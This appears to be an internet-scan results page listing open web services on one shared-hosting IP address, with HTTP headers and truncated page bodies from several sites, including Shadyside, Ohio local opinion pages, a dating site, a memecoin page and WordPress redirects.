    			<img alt="Water" src="images/construction_pipes_turn_valve_400_clr_8575.png" height="218" width="273"  ></p>
    			<p>Water prices are about to go up again. After the first of the year (2019) water rates are to go to $18.00 per thousand gallons.
    			There will be a minimum of 3000 gallons with this rate. That
    Found 2026-01-07 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · shadyside43947.com

    2026-01-07 05:16

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html
    last-modified: Sun, 09 Nov 2025 07:11:10 GMT
    accept-ranges: bytes
    content-length: 7974
    date: Wed, 07 Jan 2026 05:16:25 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Page title: Home
    
    <!DOCTYPE html>
    <html>
    
    <!-- #BeginTemplate "master.dwt" -->
    
    <head>
    <meta content="text/html; charset=utf-8" http-equiv="Content-Type" />
    <!-- #BeginEditable "doctitle" -->
    <title>Home</title>
    <meta content="Shadyside, Ohio 43947" name="keywords">
    <meta content="Shadyside, Ohio" name="description">
    <!-- #EndEditable -->
    <link href="styles/style0.css" media="screen" rel="stylesheet" title="CSS" type="text/css" />
    <style type="text/css">
    .auto-style1 {
    	font-size: large;
    }
    </style>
    </head>
    
    <body>
    <div id="container">
    <div id="lftcontainer" style="width: 169px; height: 244px">
    	<img src="images/custom_corner_street_sign.png" alt="Street sign" width="179" style="padding-top:20px" height="149"/>
    	<br><br><p class="auto-style1">shadyside43947.com</p>
    	</div>
    <!-- Begin Container -->
    <div id="rtcontainer">
    	<!-- Begin Masthead -->
    	<div id="masthead" style="height: 302px">
    		<div id="videobox" style="width:100%;height:109%" class="centercontent">
    		
    			<img alt="Bailing boat" height="283" src="images/doing_all_the_work_21647.gif" width="444"></div>
    	</div>
    	<!-- End Masthead -->
    	<!-- Begin Navigation -->
    	<div id="navigation">
    		<ul>
    			<li><a href="https://www.shadysideoh.com">Home</a></li>
    			<!--li><a href="about_me/default.html">About Me</a></li-->
    			<!--li><a href="resume/default.html">R&eacute;sum&eacute;</a></li-->
    			<!--li><a href="photo_gallery/default.html">Photo Gallery</a></li-->
    			<!--li><a href="links/default.html">Links</a></li-->
    			<!--li><a href="contact/default.html">Contact</a></li-->
    		</ul>
    	</div>
    	<!-- End Navigation -->
    	<!-- Begin content_container -->
    	<div id="content_container">
    		<!-- Begin Left Column -->
    		<div id="column_left">
    			<!-- #BeginEditable "content" -->
    			
    		<div id="column_left0">
    
    			<div class="centercontent">			
    				<h2 >New Levi defeated</h2>
    				<h3 >Levi goes up in Smoke!</h3>
    				<p style="text-align:center">
    				<img alt="Up in Smoke" src="images/explosion_300_clr_8784.gif" height="220" width="220"  ></p>
    				<p style="text-align:left">In the November 4, 2025 Shadyside Village election, it has been reported that the new levi was defeated  
    				soundly by 317 votes for and 614 against. While most of the village's levis pass by a 60/40 margin, this one only had a 34% approval rating. 
    				Over 65% of the electorate finally opened their eyes to the constant begging for more money.  </p>
    					   				
    				<p style="text-align:left">The village had two other renewal levis on the same ballot. Adding a new request for money while asking to 
    				renew two others was rather foolish. Maybe they wanted to get ahead of the state in the state's attempts to restrict property taxes. </p>
    				<p >&nbsp;</p>
    			</div>
    
    			
    			<div class="centercontent">			
    				<h2 >Swimming Pool Gutted?</h2>
    				<h3 >Tim Merryman and Council Canabalizes Swimming Pool</h3>
    				<p style="text-align:center">
    				<img alt="Swim" src="images/stick_figure_treading_water_150_wht_6482.gif" height="218" width="273"  ></p>
    				<p style="text-align:left">In the April 22, 2019 Shadyside Village Council report, it has been reported that councilman Tim Merryman proposed, and had approved, that the swimming pool 
    					be canabalized and given away. Powhatan had expressed an interest in equipment at our pool. The equipment appears to be given away for free to Powhatan by council. 
    					It’s a sign that the council is definitely planning on giving everything there away and forcing a new school upon us.    </p>
    				<p >&nbsp;</p>
    			</div>
    			
    			<!--div class="centercontent">
    			<h2 class="centercontent">Water Prices Rise Again&nbsp;</h2>
    			<h3 class="centercontent">Going From $30 to $54</h3>
    			<p style="text-align:center">
    			<img alt="Water" src="images/construction_pipes_turn_valve_400_clr_8575.png" height="218" width="273"  ></p>
    			<p>Water prices are about to go up again. After the first of the year (2019) water rates are to go to $18.00 per thousand gallons.
    			There will be a minimum of 3000 gallons with this rate. That
    Found 2026-01-07 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · shadysideohio.com

    2026-01-07 05:15

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html
    last-modified: Mon, 17 Nov 2025 14:01:51 GMT
    accept-ranges: bytes
    content-length: 8534
    date: Wed, 07 Jan 2026 05:16:00 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Page title: ShadysideOhio
    
    <!DOCTYPE html>
    <html>
    
    <head>
    <title>ShadysideOhio</title>
    
    <meta content="A variety of comments about Shadyside, Ohio 43947." name="description" />
    
    <style type="text/css">
    .style1 {
    	color: #FFFFFF;
    }
    .auto-style1 {
    	margin-left: 0px;
    }
    </style>
    
    <meta content="text/html; charset=utf-8" http-equiv="Content-Type" />
    <link href="styles/rmh.css" rel="stylesheet" type="text/css" />
    
    </head>
    
    <body>
    
    <div id="container" style="height: 2884px">
    	<div id="left_col" style="width: 270px">
    		<div>
    			<img alt="" height="208" src="images/women_construction_19724.png" width="265" />
    			<p>
    			&nbsp;</p>
    			<p>&nbsp;</p>
    			
    			<div>			
    				<ul id="list_left">
              			<li><a  href="index.html" title="Home"><span>Home</span></a></li>
              			<li>
    						<a href="" title="View all posts filed under Education"><span>Education</span></a></li>
               			<li><a  href="" title="Home"><span>Links</span></a></li>       	
            		</ul>
    
    				<p>&nbsp;</p>
    				<p>&nbsp;</p>
    			</div>
    			<div style="font-style: italic; color: #FFFFFF;">		
    				<h2>Shadyside Happenings</h2>
    			</div>		
    		</div>
    	</div>
    
    
    	
    	<div id="page_content" style="height: 537px; padding-top: 30px; color: #FFFFFF; text-align: center;">	
    		<img alt="Fireman" height="492" src="images/business_dress_shrugging_400_clr_14230.png" width="286" /><br />
    		<p></p>
    	</div><br />
    	
    		<div style="height: 318px">
    			<h3><a style="color:white" href="#kingbob"><span class="style1">Shadyside's Unfinest!</span></a></h3>
    			<p style="color:white;text-indent:20px">Village council member gets nasty!</p>
    			<h3><a style="color:white" href="#flunky"><span class="style1">Mayor and Flunkies!</span></a></h3>
    			<p style="color:white;text-indent:20px">Slumlord enters the fray re: Community Center!</p>
    			<h3><a style="color:white" href="https://www.shadysideoh.com/comments/comments_copy(1).htm">Busybodies on Patrol</a></h3>
    			<p style="color:white;text-indent:20px">Busybodies and social media don't mix well. (Opinion Page)</p>
    			<h3><a style="color:white" href="https://www.shadysideoh.net">A Village in Decline!</a></h3>
    			<p style="color:white;text-indent:20px">Today compared to 1962 in Shadyside</p>
    		</div>
    		
    		<div style="height: 2779px; color: #FFFFFF;">
    			<div id="kingbob" style="height: 1990px">
    				<br />							
    				<p style="text-align:center">
    				<img  alt="Plume" src="images/king_give_thumbs_down_400_clr_17099.png" height="218" width="203"></p>
    				<br>
    				<h2>Councilman 'King Bob' Dorris Attacks!</h2>
    				<p style="height: 49px"><br />November 14, 2025<br /></p>			
    				<h3 style="height: 110px">The 'Shadyside Discussion' page on Facebook has long been known as a sanctuary for the 'Prozac Princesses.'
    				Only positive things are allowed on the page and God help you if a post is negative. 
    				One must sing their daily requirement of Kumbaya before opening 
    				Facebook.</h3> 
    				<p style="text-align:left;padding-left:3px; height: 170px;">On thursday, November 13, 2025, a post about the caboose in council chambers was debated by many. 
    							Brook Warren posted that he felt the priorities of council was misguided. He felt that other issues were more important than to 
    							'update the Community Room.' It didn't take long for Meintel, Dorris and their Minions to attack. Meintel stated 'we didn't create all these problems...
    							If memory serves, both Meintel and Dorris were previous council members, so yes, they were responsible for a great share of the problems. Meintel wants
    							'transparency' but many coucil transcripts list 'coucil adjourns to closed meeting.' Not so transparent when hiding in a secretive meeting. And finally, Meintel tells Brook 
    							'Get used to it' in relation to his actions.
    				</p>
    				<p style="text-align:left;padding-left:3px">
    							
    				</p>
    				<p style="text-align:right; height: 605px;">
    					<img src="images/BWfacebook.png" alt="Street view" height="580" width="505" class="auto-style1">
    				</p>
    							
    				<p style="text-align
    Found 2026-01-07 by HttpPlugin
    Create report
  • Open service 162.0.235.244:80 · shadysideohio.com

    2026-01-07 05:15

    HTTP/1.1 302 Found
    keep-alive: timeout=5, max=100
    content-type: text/html
    content-length: 771
    date: Wed, 07 Jan 2026 05:16:00 GMT
    server: LiteSpeed
    cache-control: no-cache, no-store, must-revalidate, max-age=0
    location: https://www.shadysideohio.com/
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Page title:  302 Found
    
    
    <!DOCTYPE html>
    <html style="height:100%">
    <head>
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" />
    <title> 302 Found
    </title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head>
    <body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;">
    <div style="height:auto; min-height:100%; ">     <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;">
            <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">302</h1>
    <h2 style="margin-top:20px;font-size: 30px;">Found
    </h2>
    <p>The document has been temporarily moved.</p>
    </div></div></body></html>
    
    Found 2026-01-07 by HttpPlugin
    Create report
  • Open service 162.0.235.244:80 · www.shadysideohio.com

    2026-01-07 05:15

    HTTP/1.1 302 Found
    keep-alive: timeout=5, max=100
    content-type: text/html
    content-length: 771
    date: Wed, 07 Jan 2026 05:15:59 GMT
    server: LiteSpeed
    cache-control: no-cache, no-store, must-revalidate, max-age=0
    location: https://www.shadysideohio.com/
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Page title:  302 Found
    
    
    <!DOCTYPE html>
    <html style="height:100%">
    <head>
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" />
    <title> 302 Found
    </title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head>
    <body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;">
    <div style="height:auto; min-height:100%; ">     <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;">
            <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">302</h1>
    <h2 style="margin-top:20px;font-size: 30px;">Found
    </h2>
    <p>The document has been temporarily moved.</p>
    </div></div></body></html>
    
    Found 2026-01-07 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · www.shadysideohio.com

    2026-01-07 05:15

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html
    last-modified: Mon, 17 Nov 2025 14:01:51 GMT
    accept-ranges: bytes
    content-length: 8534
    date: Wed, 07 Jan 2026 05:15:59 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Page title: ShadysideOhio
    
    <!DOCTYPE html>
    <html>
    
    <head>
    <title>ShadysideOhio</title>
    
    <meta content="A variety of comments about Shadyside, Ohio 43947." name="description" />
    
    <style type="text/css">
    .style1 {
    	color: #FFFFFF;
    }
    .auto-style1 {
    	margin-left: 0px;
    }
    </style>
    
    <meta content="text/html; charset=utf-8" http-equiv="Content-Type" />
    <link href="styles/rmh.css" rel="stylesheet" type="text/css" />
    
    </head>
    
    <body>
    
    <div id="container" style="height: 2884px">
    	<div id="left_col" style="width: 270px">
    		<div>
    			<img alt="" height="208" src="images/women_construction_19724.png" width="265" />
    			<p>
    			&nbsp;</p>
    			<p>&nbsp;</p>
    			
    			<div>			
    				<ul id="list_left">
              			<li><a  href="index.html" title="Home"><span>Home</span></a></li>
              			<li>
    						<a href="" title="View all posts filed under Education"><span>Education</span></a></li>
               			<li><a  href="" title="Home"><span>Links</span></a></li>       	
            		</ul>
    
    				<p>&nbsp;</p>
    				<p>&nbsp;</p>
    			</div>
    			<div style="font-style: italic; color: #FFFFFF;">		
    				<h2>Shadyside Happenings</h2>
    			</div>		
    		</div>
    	</div>
    
    
    	
    	<div id="page_content" style="height: 537px; padding-top: 30px; color: #FFFFFF; text-align: center;">	
    		<img alt="Fireman" height="492" src="images/business_dress_shrugging_400_clr_14230.png" width="286" /><br />
    		<p></p>
    	</div><br />
    	
    		<div style="height: 318px">
    			<h3><a style="color:white" href="#kingbob"><span class="style1">Shadyside's Unfinest!</span></a></h3>
    			<p style="color:white;text-indent:20px">Village council member gets nasty!</p>
    			<h3><a style="color:white" href="#flunky"><span class="style1">Mayor and Flunkies!</span></a></h3>
    			<p style="color:white;text-indent:20px">Slumlord enters the fray re: Community Center!</p>
    			<h3><a style="color:white" href="https://www.shadysideoh.com/comments/comments_copy(1).htm">Busybodies on Patrol</a></h3>
    			<p style="color:white;text-indent:20px">Busybodies and social media don't mix well. (Opinion Page)</p>
    			<h3><a style="color:white" href="https://www.shadysideoh.net">A Village in Decline!</a></h3>
    			<p style="color:white;text-indent:20px">Today compared to 1962 in Shadyside</p>
    		</div>
    		
    		<div style="height: 2779px; color: #FFFFFF;">
    			<div id="kingbob" style="height: 1990px">
    				<br />							
    				<p style="text-align:center">
    				<img  alt="Plume" src="images/king_give_thumbs_down_400_clr_17099.png" height="218" width="203"></p>
    				<br>
    				<h2>Councilman 'King Bob' Dorris Attacks!</h2>
    				<p style="height: 49px"><br />November 14, 2025<br /></p>			
    				<h3 style="height: 110px">The 'Shadyside Discussion' page on Facebook has long been known as a sanctuary for the 'Prozac Princesses.'
    				Only positive things are allowed on the page and God help you if a post is negative. 
    				One must sing their daily requirement of Kumbaya before opening 
    				Facebook.</h3> 
    				<p style="text-align:left;padding-left:3px; height: 170px;">On thursday, November 13, 2025, a post about the caboose in council chambers was debated by many. 
    							Brook Warren posted that he felt the priorities of council was misguided. He felt that other issues were more important than to 
    							'update the Community Room.' It didn't take long for Meintel, Dorris and their Minions to attack. Meintel stated 'we didn't create all these problems...
    							If memory serves, both Meintel and Dorris were previous council members, so yes, they were responsible for a great share of the problems. Meintel wants
    							'transparency' but many coucil transcripts list 'coucil adjourns to closed meeting.' Not so transparent when hiding in a secretive meeting. And finally, Meintel tells Brook 
    							'Get used to it' in relation to his actions.
    				</p>
    				<p style="text-align:left;padding-left:3px">
    							
    				</p>
    				<p style="text-align:right; height: 605px;">
    					<img src="images/BWfacebook.png" alt="Street view" height="580" width="505" class="auto-style1">
    				</p>
    							
    				<p style="text-align
    Found 2026-01-07 by HttpPlugin
    Create report
  • Open service 162.0.235.244:80 · asoygeboy.xyz

    2026-01-06 11:20

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    content-length: 1364
    date: Tue, 06 Jan 2026 11:20:37 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Page title: Index of /
    
    <!DOCTYPE html><html><head><meta http-equiv="Content-type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><link rel="stylesheet" href="/_autoindex/assets/css/autoindex.css" /><script src="/_autoindex/assets/js/tablesort.js"></script><script src="/_autoindex/assets/js/tablesort.number.js"></script><title>Index of /</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body><div class="content"><h1 style="color: #555;">Index of /</h1>
    <div id="table-list"><table id="table-content"><thead class="t-header"><tr><th class="colname" aria-sort="ascending"><a class="name" href="?ND"  onclick="return false"">Name</a></th><th class="colname" data-sort-method="number"><a href="?MA"  onclick="return false"">Last Modified</a></th><th class="colname" data-sort-method="number"><a href="?SA"  onclick="return false"">Size</a></th></tr></thead>
    <tr><td data-sort="*cgi-bin"><a href="/cgi-bin/"><img class="icon" src="/_autoindex/assets/icons/folder-fill.svg" alt="Directory">cgi-bin</a></td><td data-sort="190898003">2026-01-06 11:13</td><td data-sort="-1">-</td></tr>
    </table></div>
    <address>Proudly Served by LiteSpeed Web Server at asoygeboy.xyz Port 80</address></div><script>new Tablesort(document.getElementById("table-content"));</script></body></html>
    
    Found 2026-01-06 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · asoygeboy.xyz

    2026-01-06 11:20

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    content-length: 1365
    date: Tue, 06 Jan 2026 11:20:36 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Page title: Index of /
    
    <!DOCTYPE html><html><head><meta http-equiv="Content-type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><link rel="stylesheet" href="/_autoindex/assets/css/autoindex.css" /><script src="/_autoindex/assets/js/tablesort.js"></script><script src="/_autoindex/assets/js/tablesort.number.js"></script><title>Index of /</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body><div class="content"><h1 style="color: #555;">Index of /</h1>
    <div id="table-list"><table id="table-content"><thead class="t-header"><tr><th class="colname" aria-sort="ascending"><a class="name" href="?ND"  onclick="return false"">Name</a></th><th class="colname" data-sort-method="number"><a href="?MA"  onclick="return false"">Last Modified</a></th><th class="colname" data-sort-method="number"><a href="?SA"  onclick="return false"">Size</a></th></tr></thead>
    <tr><td data-sort="*cgi-bin"><a href="/cgi-bin/"><img class="icon" src="/_autoindex/assets/icons/folder-fill.svg" alt="Directory">cgi-bin</a></td><td data-sort="190898003">2026-01-06 11:13</td><td data-sort="-1">-</td></tr>
    </table></div>
    <address>Proudly Served by LiteSpeed Web Server at asoygeboy.xyz Port 443</address></div><script>new Tablesort(document.getElementById("table-content"));</script></body></html>
    
    Found 2026-01-06 by HttpPlugin
    Create report
  • Open service 162.0.235.244:80 · datingarichman.com

    2026-01-04 08:42

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html
    last-modified: Sun, 04 Jan 2026 08:00:36 GMT
    accept-ranges: bytes
    content-length: 8252
    date: Sun, 04 Jan 2026 08:42:53 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Page title: Dating a Rich Man | Best Rich Men Dating Site
    
    <!DOCTYPE HTML>
    <html lang="en">
    <html>
    	<head>
    		<meta charset="utf-8" />
     <title>Dating a Rich Man | Best Rich Men Dating Site</title>
            <meta name="description"
        content="Datingarichman is the best rich men dating site to date a rich man and find serious relationships. Sign up free." />
      <meta name="keywords"
        content="dating a rich man, rich men, rich men dating, dating rich men, meet rich men, rich men dating site" />
    		<meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no" />
             <link rel="canonical" href="https://www.datingarichman.com">
    		<link rel="stylesheet" href="assets/css/main.css" />
            <link rel="icon" href="favicon.ico">
    	</head>
    	<body class="landing is-preload">
    		<div id="page-wrapper">
    
    			<!-- Header -->
    				<header id="header" class="alt">
    					<h1><a href="https://www.datingarichman.com">Dating a Rich Man</a></h1>
    					<nav id="nav">
    						<ul>
    							<li><a href="https://www.datingarichman.com/">Home</a></li>
                                <li><a href="about.html">About</a></li>
    							<li><a href="https://www.datingarichman.com/join" class="button">Sign Up</a></li>
    						</ul>
    					</nav>
    				</header>
    
    			<!-- Banner -->
    				<section id="banner">
    					<h2>Dating a Rich Man for Serious Relationships</h2>
    					<p>Welcome to DatingARichMan.com – Your Trusted Gateway to Rich Connections. Since 2001, we have fostered the safest and most exclusive dating community for successful, affluent gentlemen and discerning, attractive women. If you are ready to meet confident, accomplished partners who value discretion and genuine relationships, you are in the right place. Join our curated network where quality, security, and sophistication come first. Your journey to meaningful companionship with the world's most desirable singles begins here. So, why wait? Start your exclusive match today.</p>
    					<ul class="actions special">
    						<li><a href="https://www.datingarichman.com/join" class="button">SIGN UP NOW</a></li>
    					</ul>
    				</section>
    
    			<!-- Main -->
    				<section id="main" class="container">
    
    					<section class="box special">
    						<header class="major">
    							<h2>Best High-quality Dating Site to Find Rich Men</h2>
    							<p>Tired of the constant grind and dreaming of a life with true financial ease? You're not alone. Since 2001, we've been the trusted rich men dating space where genuine connections are made. We guide thoughtful women through meeting, connecting with, and building real relationships with established, successful rich men. Yes, most serious dating platforms like ours have an extensive sign-up process. You’ll be asked about your hobbies, education, and professional background—not to create barriers, but to carefully cultivate a community where quality, safety, and meaningful beginnings are truly possible. Your chapter with someone truly accomplished starts here.</p>
    						</header>
    					</section>
    
    					<section class="box special features">
    						<div class="features-row">
    							<section>
    								<span class="icon solid major fa-bolt accent2"></span>
    								<h3>Build Your Profile</h3>
    								<p>Start with a free profile, showcasing your best photos—because a better profile equals a better chance.</p>
    							</section>
    							<section>
    								<span class="icon solid major fa-chart-area accent3"> </span>
    								<h3>Search & Chat</h3>
    								<p>Find rich & attractive singles nearby, send unlimited winks, and chat freely—No Rules, No Limits.</p>
    							</section>  
    						</div>
                            
    						<div class="features-row">
    							<section>
    								<span class="icon solid major fa-cloud accent4"></span>
    								<h3>Discover Your Match</h3>
    								<p>Establish your rich connection and achieve your desires—No Drama, No Games.</p>
    							</section>
    							<section>
    								<span class="icon solid major fa-lock accent5"></span>
    								<h3>Privacy Safeguardertm</h3>
    								<p>The utmost protection and confidentiality of your personal inf
    Found 2026-01-04 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · www.cccapintel.com

    2026-01-03 00:47

    HTTP/1.1 301 Moved Permanently
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    x-redirect-by: WordPress
    location: https://cccapintel.com/
    x-litespeed-cache: miss
    content-length: 0
    date: Sat, 03 Jan 2026 00:47:56 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2026-01-03 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · hyper.meme

    2026-01-03 00:47

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    link: <https://hyper.meme/index.php?rest_route=/>; rel="https://api.w.org/"
    link: <https://hyper.meme/index.php?rest_route=/wp/v2/pages/7>; rel="alternate"; title="JSON"; type="application/json"
    link: <https://hyper.meme/>; rel=shortlink
    etag: "1029-1767401230;;;"
    x-litespeed-cache: miss
    content-length: 23083
    date: Sat, 03 Jan 2026 00:47:10 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Page title: Hyper – Hypermemecoinization
    
    <!DOCTYPE html>
    <html lang="en-US">
    <head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>Hyper &#8211; Hypermemecoinization</title>
    <meta name='robots' content='max-image-preview:large' />
    	<style>img:is([sizes="auto" i], [sizes^="auto," i]) { contain-intrinsic-size: 3000px 1500px }</style>
    	<link rel='dns-prefetch' href='//fonts.googleapis.com' />
    <link rel="alternate" type="application/rss+xml" title="Hyper &raquo; Feed" href="https://hyper.meme/?feed=rss2" />
    <link rel="alternate" type="application/rss+xml" title="Hyper &raquo; Comments Feed" href="https://hyper.meme/?feed=comments-rss2" />
    <script>
    window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/16.0.1\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/16.0.1\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/hyper.meme\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.8.3"}};
    /*! This file is auto-generated */
    !function(s,n){var o,i,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),a=(e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(n,0,0),new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data));return t.every(function(e,t){return e===a[t]})}function u(e,t){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);for(var n=e.getImageData(16,16,1,1),a=0;a<n.data.length;a++)if(0!==n.data[a])return!1;return!0}function f(e,t,n,a){switch(t){case"flag":return n(e,"\ud83c\udff3\ufe0f\u200d\u26a7\ufe0f","\ud83c\udff3\ufe0f\u200b\u26a7\ufe0f")?!1:!n(e,"\ud83c\udde8\ud83c\uddf6","\ud83c\udde8\u200b\ud83c\uddf6")&&!n(e,"\ud83c\udff4\udb40\udc67\udb40\udc62\udb40\udc65\udb40\udc6e\udb40\udc67\udb40\udc7f","\ud83c\udff4\u200b\udb40\udc67\u200b\udb40\udc62\u200b\udb40\udc65\u200b\udb40\udc6e\u200b\udb40\udc67\u200b\udb40\udc7f");case"emoji":return!a(e,"\ud83e\udedf")}return!1}function g(e,t,n,a){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):s.createElement("canvas"),o=r.getContext("2d",{willReadFrequently:!0}),i=(o.textBaseline="top",o.font="600 32px Arial",{});return e.forEach(function(e){i[e]=t(o,e,n,a)}),i}function t(e){var t=s.createElement("script");t.src=e,t.defer=!0,s.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",i=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){s.addEventListener("DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.supportTests)return e.supportTests}catch(e){}return null}();if(!n){if("undefined"!=typeof Worker&&"undefined"!=typeof OffscreenCanvas&&"undefined"!=typeof URL&&URL.createObjectURL&&"undefined"!=typeof Blob)try{var e="postMessage("+g.toString()+"("+[JSON.stringify(i),f.toString(),p.toString(),u.toString()].join(",")+"));",a=new Blob([e],{type:"text/javascript"}),r=new Worker(URL.createObjectURL(a),{name:"wpTestEmojiSupports"});return void(r.onmessage=function(e){c(n=e.data),r.terminate(),t(n)})}catch(e){}c(n=g(i,f,p,u))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings);
    </script>
    <link rel="preconnect" href="https://fonts.
    Found 2026-01-03 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · www.mirental.ca

    2026-01-03 00:32

    HTTP/1.1 301 Moved Permanently
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    x-redirect-by: WordPress
    location: https://mirental.ca/
    x-litespeed-cache: miss
    content-length: 0
    date: Sat, 03 Jan 2026 00:32:19 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2026-01-03 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · tsquare.com.pk

    2026-01-03 00:12

    HTTP/1.1 301 Moved Permanently
    keep-alive: timeout=5, max=100
    x-powered-by: PHP/8.4.15
    content-type: text/html; charset=UTF-8
    x-redirect-by: WordPress
    location: https://www.tsquare.com.pk/
    x-litespeed-cache: miss
    content-length: 0
    date: Sat, 03 Jan 2026 00:12:38 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2026-01-03 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · www.nexuxtalentpartner.site

    2026-01-02 23:18

    HTTP/1.1 301 Moved Permanently
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    permissions-policy: private-state-token-redemption=(self "https://www.google.com" "https://www.gstatic.com" "https://recaptcha.net" "https://challenges.cloudflare.com" "https://hcaptcha.com"), private-state-token-issuance=(self "https://www.google.com" "https://www.gstatic.com" "https://recaptcha.net" "https://challenges.cloudflare.com" "https://hcaptcha.com")
    x-redirect-by: WordPress
    location: https://nexuxtalentpartner.site/
    content-length: 0
    date: Fri, 02 Jan 2026 23:18:28 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2026-01-02 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · dubaiforkliftrental.com

    2026-01-02 22:55

    HTTP/1.1 301 Moved Permanently
    keep-alive: timeout=5, max=100
    x-powered-by: PHP/8.4.15
    content-type: text/html; charset=UTF-8
    x-redirect-by: WordPress
    location: https://www.dubaiforkliftrental.com/
    x-litespeed-cache: miss
    content-length: 0
    date: Fri, 02 Jan 2026 22:55:47 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2026-01-02 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · hmq.devdecimosite2025.com

    2026-01-02 22:17

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    link: <https://hmq.devdecimosite2025.com/wp-json/>; rel="https://api.w.org/"
    link: <https://hmq.devdecimosite2025.com/wp-json/wp/v2/pages/7>; rel="alternate"; title="JSON"; type="application/json"
    link: <https://hmq.devdecimosite2025.com/>; rel=shortlink
    etag: "1676-1767345977;;;"
    x-litespeed-cache: hit
    transfer-encoding: chunked
    date: Fri, 02 Jan 2026 22:17:10 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2026-01-02 by HttpPlugin
    Create report
